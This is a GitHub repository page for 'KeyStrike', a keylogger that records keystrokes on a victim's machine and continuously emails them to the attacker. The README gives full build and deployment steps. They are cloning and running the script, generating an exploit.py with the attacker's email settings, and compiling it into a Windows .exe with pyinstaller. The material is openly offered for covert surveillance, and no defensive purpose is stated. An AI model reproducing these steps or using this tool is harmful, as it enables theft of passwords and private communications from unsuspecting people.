Skip to content

dr3dd589/KeyStrike

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

KeyStrike

A simple Keylogger to detect key logs from the victim machine and send report to the attacker's email continuously.

How to run:

git clone https://github.com/dr3dd589/KeyStrike.git
cd KeyStrike
pip3 install -r requirements.txt
python3 KeyStrike.py

An exploit.py file will be generated with your email info where you want to send with a temporary email. To run this exploit on windows you have to convert it to .exe file.

You can generate it with pyinstaller just run this command:

pyinstaller --onefile exploit.py
cd dist

exploit.exe file is in dist folder now you can use it.

alt text

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Contributors 2

  •  
  •  

Languages